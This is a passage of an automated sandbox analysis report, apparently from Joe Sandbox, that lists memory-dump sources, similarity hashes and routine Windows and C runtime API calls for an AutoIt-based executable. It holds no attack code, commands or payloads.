          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
          • String ID:
          • API String ID: 2880819207-0
          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
          APIs
          • GetWindowRect.USER32(?,?), ref: 00430BA2
          • ScreenToClient.USER32(?,?), ref: 00430BC1
          • ScreenToClient.USER32(?,?), ref: 00430BE2
          • InvalidateRect.USER32(?,?,?), ref: 00430BFB
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ClientRectScreen$InvalidateWindow
          • String ID:
          • API String ID: 357397906-0
          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
          APIs
          • __wsplitpath.LIBCMT ref: 0043392E
            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
          • __wsplitpath.LIBCMT ref: 00433950
          • __wcsicoll.LIBCMT ref: 00433974
          • __wcsicoll.LIBCMT ref: 0043398A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
          • String ID:
          • API String ID: 1187119602-0
          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
          • String ID:
          • API String ID: 3016257755-0
          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
          • Instruction ID: fa6d01852bb983edeafff486d0019367465e9530caf48e469f9bea5953271079
          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
          • Instruction Fuzzy Hash: FE11727250005DFBCF125E85EC41CEE3F22BB28394B9A8416FE1858131C73AC9B1AB85
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$_malloc_wcscat_wcscpy
          • String ID:
          • API String ID: 1597257046-0
          • Opcode ID: 8ed18e447fe8052eaf0a4e28c8c6dcef04c5ee103a5240863945d57e7ed352b8
          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
          • Opcode Fuzzy Hash: 8ed18e447fe8052eaf0a4e28c8c6dcef04c5ee103a5240863945d57e7ed352b8
          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
          APIs
          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
          • __malloc_crt.LIBCMT ref: 0041F5B6
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: EnvironmentStrings$Free__malloc_crt
          • String ID:
          • API String ID: 237123855-0
          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DeleteDestroyObject$IconWindow
          • String ID:
          • API String ID: 3349847261-0
          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
          APIs
          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
          • String ID:
          • API String ID: 2223660684-0
          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
          APIs
            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
          • LineTo.GDI32(?,?,?), ref: 00447326
          • EndPath.GDI32(?), ref: 00447336
          • StrokePath.GDI32(?), ref: 00447344
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
          • String ID:
          • API String ID: 2783949968-0
          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
          APIs
          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
          • GetCurrentThreadId.KERNEL32(00000000), ref: 004364A3
          • AttachThreadInput.USER32(00000000), ref: 004364AA
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
          • String ID:
          • API String ID: 2710830443-0
          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
          APIs
          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
          • CloseHandle.KERNEL32(?), ref: 00436C56
          • CloseHandle.KERNEL32 ref: 00436C5B
            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
          • String ID:
          • API String ID: 146765662-0
          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
          APIs
          • GetDesktopWindow.USER32 ref: 00472B63
          • GetDC.USER32(00000000), ref: 00472B6C
          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
          • ReleaseDC.USER32(00000000,?), ref: 00472B99
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CapsDesktopDeviceReleaseWindow
          • String ID:
          • API String ID: 2889604237-0
          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
          APIs
          • GetDesktopWindow.USER32 ref: 00472BB2
          • GetDC.USER32(00000000), ref: 00472BBB
          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CapsDesktopDeviceReleaseWindow
          • String ID:
          • API String ID: 2889604237-0
          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
          APIs
          • __getptd_noexit.LIBCMT ref: 00415150
            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32(?,004115F6,?,00401BAC,?,?,?), ref: 00417A46
            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
          • CloseHandle.KERNEL32(?), ref: 00415164
          • __freeptd.LIBCMT ref: 0041516B
          • ExitThread.KERNEL32 ref: 00415173
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
          • String ID:
          • API String ID: 1454798553-0
          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _strncmp
          • String ID: Q\E
          • API String ID: 909875538-2189900498
          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
          APIs
          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
          • String ID: AutoIt3GUI$Container
          • API String ID: 2652923123-3941886329
          • Opcode ID: 634326104f79f067b6a6e2252a2c65d9d363141c2510f8b701aa40cb56eb15b3
          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
          • Opcode Fuzzy Hash: 634326104f79f067b6a6e2252a2c65d9d363141c2510f8b701aa40cb56eb15b3
          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove
          • String ID: \$h
          • API String ID: 4104443479-677774858
          • Opcode ID: 4c73d132c0a4e26f10933baf4986b6340b1ce7e87b1377c10ca5d3f60b2040bd
          • Instruction ID: 1230765a11e5d26fe0c09d3beb50db8841d644e564ce461ab05fc0f44c219940
          • Opcode Fuzzy Hash: 4c73d132c0a4e26f10933baf4986b6340b1ce7e87b1377c10ca5d3f60b2040bd
          • Instruction Fuzzy Hash: 82814074E002098FEF18CFA5D8806AEBBB2FFC9314F24826AD8159B394D7359946CB55
          APIs
            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
          • __wcsnicmp.LIBCMT ref: 00467288
